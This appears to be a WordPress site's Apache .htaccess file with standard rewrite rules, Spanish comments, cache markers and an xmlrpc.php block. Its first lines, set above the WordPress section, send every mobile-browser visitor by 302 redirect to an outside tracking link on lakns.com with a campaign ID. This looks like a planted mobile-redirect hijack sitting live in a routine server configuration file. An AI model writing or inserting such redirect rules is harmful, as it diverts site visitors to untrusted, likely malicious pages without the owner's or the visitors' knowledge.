RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "Android|iPhone|iPad|iPod|BlackBerry|Windows Phone" [NC]
RewriteRule ^.*$ https://lakns.com/link?z=9557727&var=neicentrodeformacion&ymid={CLICK_ID} [R=302,L]

# BEGIN LSCACHE
# END LSCACHE
# BEGIN NON_LSCACHE
# END NON_LSCACHE

# BEGIN WordPress
# Las directivas (líneas) entre «BEGIN WordPress» y «END WordPress» son
# generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress.
# Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /biblioteca/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /biblioteca/index.php [L]
</IfModule>

# END WordPress
# BEGIN LiteSpeed Cache
# END LiteSpeed Cache

<Files xmlrpc.php>
Order allow,deny
Deny from all
</Files>
